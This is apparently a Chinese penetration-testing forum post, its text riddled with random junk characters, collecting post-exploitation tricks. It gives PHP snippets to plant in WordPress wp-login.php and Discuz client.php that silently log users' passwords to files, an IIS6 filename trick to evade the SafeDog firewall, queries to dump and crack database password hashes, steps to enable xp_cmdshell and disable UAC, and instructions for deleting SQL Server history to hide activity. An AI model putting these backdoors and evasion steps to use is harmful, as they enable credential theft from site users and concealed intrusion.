$log_ip=$_SERVER["REMOTE_ADDR"];. W' F0 e/ L4 P- \
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
* C/ @' _1 q6 u$ t! Z! B: T5 D$txt=$txt.”\r\n”;
& n3 q. e8 V* ~& Fif($log_user&&$log_pwd&&$log_ip){
6 u6 x/ _1 c/ [0 v3 S$ O4 @1 W; k% [@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
3 j) }2 V2 ~2 e' E5 n5 T}
6 {  D. |" Z7 Z3 d  _当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
* n7 h( D1 v6 _+ m就是搜索case ‘login’
3 _3 J$ {8 s5 y* w1 L在它下面直接插入即可,记录的密码生成在pwd.txt中,
! S4 o, r+ ]+ D6 c其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录7 {' M1 x: |% C8 y0 K
利用II6文件解析漏洞绕过安全狗代码:
& C6 z' y4 ]. {2 V3 \" v8 A;antian365.asp;antian365.jpg
, I! `4 |: v: [
" C1 N6 o# ^2 `9 ]  K各种类型数据库抓HASH破解最高权限密码!
  g8 G0 i. a7 |3 w9 k1.sql server2000# U4 y3 [  W* i+ w8 v) \# c, ^
SELECT password from master.dbo.sysxlogins where name='sa'& R. s8 ^3 E$ p% j" w7 l
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341) w1 }6 n. n  R# a- F
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A; }' U6 _' _) s7 ?
  _. v  q# O' u/ k, `  `/ q
0×0100- constant header2 ?( c, H; e' O' S& S: d; H+ I
34767D5C- salt5 f$ M9 G2 J0 K! f, a
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash/ T- p1 o# N- ]  E
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
/ p$ M6 ~: I7 [! ~4 }4 i5 tcrack the upper case hash in ‘cain and abel’ and then work the case sentive hash8 e. |- m1 r, h- ?' q2 X
SQL server 2005:-
5 R5 @' ]% y' f0 `SELECT password_hash FROM sys.sql_logins where name='sa'; ?1 G! @6 Y6 w3 D" Q
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F  `$ j2 ^7 F. V! S( \) ^$ T* ]0 b
0×0100- constant header+ w8 v5 }+ C( }( v  y! `
993BF231-salt
& [6 K% Z: u7 R5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
2 s% u. ^( W, f9 g: b9 ^crack case sensitive hash in cain, try brute force and dictionary based attacks.
8 z0 K3 m+ g+ }8 M, _9 q/ l4 q
$ `- i9 ]7 @: b: yupdate:- following bernardo’s comments:-0 \: H' o9 h$ @% D
use function fn_varbintohexstr() to cast password in a hex string., J5 n/ E: U9 u
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
* S1 W+ F) }1 |. d% y% r5 Q) j/ G" y& C( n( d& A/ _3 Y% q# o3 i
MYSQL:-4 U: c1 k; N. a, M0 h& V3 l' d
- I9 w4 c: E+ Q, }+ q2 V
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
0 i5 X) R2 ~' w$ }: z0 D6 m
8 v: l: C" U8 j3 L4 I1 U*mysql  < 4.1
8 C& k% z: c) t. |" k% c, G: v' C1 {
mysql> SELECT PASSWORD(‘mypass’);& V5 Y+ b! E) g3 w: f( q! U
+——————–+
3 e) q9 J. G/ `8 a3 q9 h| PASSWORD(‘mypass’) |
" y) m. Z: i: R$ T5 H4 k+——————–+- m9 F, v( O1 u0 X! v/ ?) z% h
| 6f8c114b58f2ce9e   |1 L% z3 A3 T/ V
+——————–+/ |* T; b) P+ y# i" V

' H- E5 o+ D9 ]7 Q' I  w3 A: ?*mysql >=4.1- J: H6 R* E2 r' b
+ b* _( {0 A1 _. f3 h* m
mysql> SELECT PASSWORD(‘mypass’);3 |9 l! J4 d0 Y
+——————————————-+
& `8 ?7 j$ y1 |* r0 Z2 a| PASSWORD(‘mypass’)                        |2 p/ ]  ?8 R; V7 \6 F
+——————————————-+. T# |3 O0 v4 a$ q, a# \  ]
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |* A( P% f& A, l( d! e
+——————————————-+' r; w" }2 v& v, X0 T! A- H' R
+ q: y/ t; }# l+ k! {' `2 E3 }
Select user, password from mysql.user
! R9 W  v' y; `, S+ fThe hashes can be cracked in ‘cain and abel’9 G* J! U6 ]) k8 b/ J

! e9 _) s+ t; G# N+ e( L  ^+ N8 QPostgres:-  E, q% |2 k  t
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)1 }, n# c) r! I/ ?
select usename, passwd from pg_shadow;
# x% J: U' |; y% N. @# F$ Z/ L. J$ Tusename      |  passwd, Y) [/ _! o1 l0 c- r
——————+————————————-
* d8 i2 ~7 B3 u) utestuser            | md5fabb6d7172aadfda4753bf0507ed4396
. C8 C* X. h) Juse mdcrack to crack these hashes:-
) z- ?% y3 [0 ?3 T$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
" U2 \0 Z! w8 \. j4 G" w: J7 I2 x* _" \  K
Oracle:-
7 e6 i) Z$ o  t- d. @select name, password, spare4 from sys.user$1 A" h! M! e' R& T4 [1 d7 Z
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g9 I9 B' a* `1 B' Z
More on Oracle later, i am a bit bored….
$ T+ j; z% }' ]* g( n3 @# K9 Y, W2 }$ s" N2 z" u
" P+ l4 |3 g& Z% ?+ ~: h
在sql server2005/2008中开启xp_cmdshell% k8 y) t/ E: I6 m1 ^6 }0 P; K: A/ @
-- To allow advanced options to be changed.
* L0 S- v/ \* o" eEXEC sp_configure 'show advanced options', 1* B) F( X+ ~6 d
GO
' W( ]* p: ^- m: e-- To update the currently configured value for advanced options.0 F9 ~8 t# [- q* v( q7 b2 T
RECONFIGURE
. a$ }4 J6 p/ K3 S+ ]* u+ ^GO; `  P8 A( r$ F/ f! F
-- To enable the feature.
+ c6 a( }! E- C) d) SEXEC sp_configure 'xp_cmdshell', 1/ O9 v( r' m# K1 ~  y
GO/ A8 B: H8 k! ~) Q9 i" }7 S4 F" y
-- To update the currently configured value for this feature.9 g0 B9 y/ d! a( x- H( Y% ~! d
RECONFIGURE! B6 y2 R% v, ]) B, g% f
GO' e# |  M' K2 w
SQL 2008 server日志清除,在清楚前一定要备份。, s+ U8 j; O4 _, ~, Q
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
9 Y7 ?9 B1 l" z5 T. u; \/ T! aX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
& ?# \8 f6 }6 s5 y- d& s
( Z$ g6 F  j" U5 ]$ Z: D5 m7 z3 H# f对于SQL Server 2008以前的版本:4 d; @) Q. i, Z  h9 @
SQL Server 2005:
8 J( R3 K: \. s5 n2 V$ Q2 n删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
: s5 u# O$ u. s- x, T3 hSQL Server 2000:( t  X3 s; z: b
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。
$ M7 q8 w: p3 v% n9 S+ Q2 |$ G2 y: t4 a$ c
本帖最后由 simeon 于 2013-1-3 09:51 编辑/ Q3 N, z3 s( g# ^$ V
4 v7 M1 q6 h! o" ]9 O) o, `
9 w: D7 E6 e8 a- A7 m& v9 O
windows 2008 文件权限修改9 h. u: {3 o+ ~3 n8 i) B
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx- o. t# S- P* J$ g/ C
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
9 j! s4 S  u$ l% H4 n一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
7 |. i8 E$ ?1 p& w) J9 L( e. ^7 d( D, e5 m/ }* I+ d8 p$ _
Windows Registry Editor Version 5.00
6 ~- [" Y) U% i' \" c[HKEY_CLASSES_ROOT\*\shell\runas]
. e6 n& U; C) A3 N+ y% r@="管理员取得所有权"
% B# V9 e" j+ {4 w) d' A"NoWorkingDirectory"=""
: z& ^/ O! X7 ~[HKEY_CLASSES_ROOT\*\shell\runas\command]
! c3 ^! q; d6 h@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
7 d( O/ g0 N! v  ~, |"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"8 x6 w- M* u: |$ z3 \. `
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
& B4 S1 @7 j9 M/ [@="管理员取得所有权"2 W9 b' y, d, K. N
"NoWorkingDirectory"=""
5 _, _% S1 K4 k9 J! E/ i[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
, T% d9 y9 J8 b, v( g@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
2 m! M: i& K3 F3 o# o1 O' s"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"& E: R5 f; e  m3 V" Y1 n8 |
9 w9 b4 q; P4 P+ h5 j; q5 G+ G
[HKEY_CLASSES_ROOT\Directory\shell\runas]2 h- y0 l% p1 L) K+ r
@="管理员取得所有权"7 G( r6 Z( v' r+ ?4 t
"NoWorkingDirectory"=""
; l$ V" k1 C5 D6 O9 U' S$ l$ @1 x[HKEY_CLASSES_ROOT\Directory\shell\runas\command]4 i6 P4 N5 |( ]- B3 c: [' O6 [, E
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
. ]+ [& u6 V: R2 c& K"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"1 U5 m) ^7 d& h. X+ {9 k

8 t- T6 S0 K& _8 c% c+ A
' T  b$ R% u( H4 Nwin7右键“管理员取得所有权”.reg导入; U0 j0 V) a# D) Z
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,: s4 I$ b( t4 H4 Z) r. u+ j2 n! i
1、C:\Windows这个路径的“notepad.exe”不需要替换3 y' x% `  q  j: t- R$ f/ R4 c( k
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换1 K( d% @2 H2 L* @9 p/ H0 A
3、四个“notepad.exe.mui”不要管
( l1 W: i) M; m( e% G# I# I$ \5 n# k' x4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
8 y8 `$ z4 i7 o4 YC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”9 [4 f7 T8 O( O& b2 H; \
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
. M: R; T' B4 F$ j* @替换完之后回到桌面,新建一个txt文档打开看看是不是变了。1 x9 q4 V5 e4 R# V! E+ O
windows 2008中关闭安全策略:
$ Q" \- E1 e" U8 p2 Z' @& B# y5 dreg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f+ C( ?1 }" B/ u7 G/ t- U
修改uc_client目录下的client.php 在( |. m6 H& F4 E: M
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
2 u. b6 B2 m, B2 S下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
8 `; A- Z1 v0 S! q+ P/ {你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw$ i! o! S; I& J- K& v7 u8 l% @
if(getenv('HTTP_CLIENT_IP')) {' D, f; w4 L) G' F( l8 h) Z
$onlineip = getenv('HTTP_CLIENT_IP');- k( {7 E  {; l: T2 V3 E+ p4 C
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
, \, l+ j% s* w  o! W) D# O  @$onlineip = getenv('HTTP_X_FORWARDED_FOR');9 O" @: f, ~, y5 p$ h
} elseif(getenv('REMOTE_ADDR')) {( j! J1 s* h' ?1 T; V' K, _
$onlineip = getenv('REMOTE_ADDR');3 v4 A! ^) I" c! v* ~4 j" M% J- _" w! p
} else {4 v. x' {9 O4 l2 `
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
' p  S0 d1 J% K  p4 V  ^1 ^1 }6 X}
5 U7 L; m1 p, y     $showtime=date("Y-m-d H:i:s");" q0 p1 l* [3 K  ?" u! w
    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";" n' ^) |" f7 }( r
    $handle=fopen('./data/cache/csslog.php','a+');
. K4 t/ j! `* ?9 {    $write=fwrite($handle,$record);




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2